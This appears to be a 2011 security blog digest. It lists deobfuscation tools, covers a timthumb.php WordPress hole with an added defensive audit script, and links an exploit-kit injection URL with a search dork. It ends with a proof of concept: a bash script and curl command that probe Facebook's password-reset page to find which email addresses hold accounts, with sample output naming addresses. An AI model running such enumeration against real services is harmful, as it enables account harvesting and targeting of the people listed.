Wednesday, 3. August 2011
Script Deobfuscation Tools
Web pages that contain exploits often use a series of redirects and obfuscated code to make them harder to follow. Programs useful for exploring malicious pages:

* Creme Brulee
http://code.google.com/p/cremebrulee/
* Firebug – Firefox plug-in
http://getfirebug.com/
* Google Chrome Developer Tools
http://www.google.com/chrome/
* Javascript Deobfuscator – Firefox plug-in
https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
* JSDebug
http://www.codeproject.com/KB/scripting/hostilejsdebug.aspx
* Malzilla
http://malzilla.sourceforge.net/
* Microsoft IE8 Developer Tools
http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8
* Microsoft Script Debugger
http://www.microsoft.com/downloads/en/details.aspx?familyid=2f465be0-94fd-4569-b3c4-dffdf19ccd99&displaylang=en&pf=true
* Rhino
http://www.mozilla.org/rhino/
* SpiderMonkey + V8
https://developer.mozilla.org/en/SpiderMonkey
http://code.google.com/p/v8/
* The Mina
http://dontstuffbeansupyournose.com/2008/11/23/javascript-malware-deobfuscation/

nSpaces
nSpaces: Multiple virtual Desktops With Password Protection and easy switch
Features of nSpaces

Launch Desktops: Create multiple desktops on your computer.
Launch Apps: Open different applications on each separate virtual desktop to improve your productivity.
Name your space: Label each virtual desktop with a tag; the tag is shown on the space switcher.
Change wallpaper: Your desktop is unique. Set a custom desktop image for each of your desktops and watch as the pictures fade into each other when switching between your desktops.
Color your space: If you don’t want to set a custom image for each desktop, just set a background color for them.
Protect your space: If you don’t want anonymous users to use your spaces, just set a password for them.
Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you create, plus a hotkey for the space switcher. You can change whatever you want.
nSpaces is easy to use, with a simple menu-driven GUI. It is fast to configure, change and save settings.

Download
http://www.bytesignals.com/binary/nspaces/setup.exe

Websitedefender
Features of WebsiteDefender

Detect Malware present on your website
Audit your web site for security issues
Avoid getting blacklisted by Google
Keep your web site content & data safe
Get alerted to suspicious hacker activity
Secures against malware and hackers
Keeps your customers data safe
Avoid being blacklisted by Google
Provides WordPress security

Click here to register or know more on WebsiteDefender.
https://dashboard.websitedefender.com/register-for-free-website-scan.php

Hexinject - Linux
These are the current features of Hexinject:

Hexadecimal and raw data injection on the net
Sniff data in hexadecimal or raw format from the net
Data can be piped and easily manipulated
Raw network access cmdline framework
Automatically set the correct checksum (IP, TCP, UDP, ICMP)
Automatically set the correct packet length (IP, TCP, UDP, ICMP)

Download
http://sourceforge.net/projects/hexinject/files/

WordPress image utility - PHP Upload
The Exec summary: An image resizing utility called "timthumb.php" is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised.

Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
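
The two checks the post recommends (an empty $allowedSites array in every bundled timthumb.php, and a recursive search for base64_decode alongside long encoded strings), as an added shell example that is not part of the original post. The sample tree, the example.com host and the 100-character threshold are assumptions made for illustration.

```sh
#!/bin/sh
# Added example (not from the original post): audit a WordPress tree for the
# two conditions the post names. Paths and sample files below are constructed.

# Print each timthumb.php whose $allowedSites declaration is not `array()`.
# A declaration that opens on one line and lists hosts on the next lines
# counts as non-empty, which errs on the side of reporting.
find_open_timthumb() {
    find "$1" -type f -name 'timthumb.php' | sort | while IFS= read -r f; do
        if grep -E '\$allowedSites[[:space:]]*=[[:space:]]*array[[:space:]]*\(' "$f" |
           grep -Evq 'array[[:space:]]*\([[:space:]]*\)'; then
            printf '%s\n' "$f"
        fi
    done
}

# Print each .php file that calls base64_decode and also contains a run of at
# least $2 (default 100) base64 characters. Hits are leads for manual review.
find_encoded_php() {
    find "$1" -type f -name '*.php' -exec grep -l 'base64_decode' {} + |
    while IFS= read -r f; do
        if grep -Eq "[A-Za-z0-9+/=]{${2:-100},}" "$f"; then
            printf '%s\n' "$f"
        fi
    done | sort
}

# Build a small constructed tree to run the checks against.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/themes/a" "$root/themes/b/cache"
    # Theme a: bundled timthumb.php that still lists a remote host.
    printf '%s\n' '<?php' '$allowedSites = array (' "    'example.com'," ');' \
        > "$root/themes/a/timthumb.php"
    # Theme b: timthumb.php edited so the array is empty.
    printf '%s\n' '<?php' '$allowedSites = array();' > "$root/themes/b/timthumb.php"
    # Cache file with a 120-character encoded string passed to base64_decode.
    blob=$(printf '%0120d' 0 | tr 0 A)
    printf '<?php $x = base64_decode("%s");\n' "$blob" > "$root/themes/b/cache/x.php"
    # Short, ordinary use of base64_decode: must not be reported.
    printf '%s\n' '<?php echo base64_decode("aGVsbG8=");' > "$root/themes/a/ok.php"
    printf '%s\n' "$root"
}

tree=$(make_sample_tree)
echo 'timthumb.php with non-empty $allowedSites:'; find_open_timthumb "$tree"
echo 'PHP files with base64_decode and a long encoded run:'; find_encoded_php "$tree"
rm -rf "$tree"
```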

Android Trojan records phone calls - Android
A Trojan spying on your conversations

Source
http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-your-conversations.aspx

Practical C++ Decompilation
C++ decompilation: how to handle it in IDA and the Hex-Rays decompiler. You can get the slides here:
http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf
and download the recorded talk here:
http://www.archive.org/details/Recon_2011_Practical_Cpp_decompilation

Best Pack exploit kit
The new injection URL is 1see[dot]ir/j/, currently leading to a Best Pack exploit kit.

Google Dork
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/

Facebook password recovery
Step by step:

- Go to http://m.facebook.com

- Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)

- Try using a real email address and try to use a fake email address,
you will see two different behaviors.

Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing an email address through
the "ep" variable.

Using cURL:

curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0


This process has no validation for external or forgery site/form.


Using the script:

#--------------------
#!/bin/bash
for mail in $(cat "$1");
do
    # A response that contains a form is reported as "no account" for that address.
    s=$(curl -s -d "ep=$mail" "http://m.facebook.com/reset.php?refid=0" | grep form >/dev/null);
    if [ $? -eq 0 ]; then
        echo "$mail No tiene cuenta.";
    else
        echo "$mail Si tiene cuenta.";
    fi
done

#+----- EOF ------+


You can enumerate users by using a list of email addresses or phone numbers.

$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO

by
Zerial
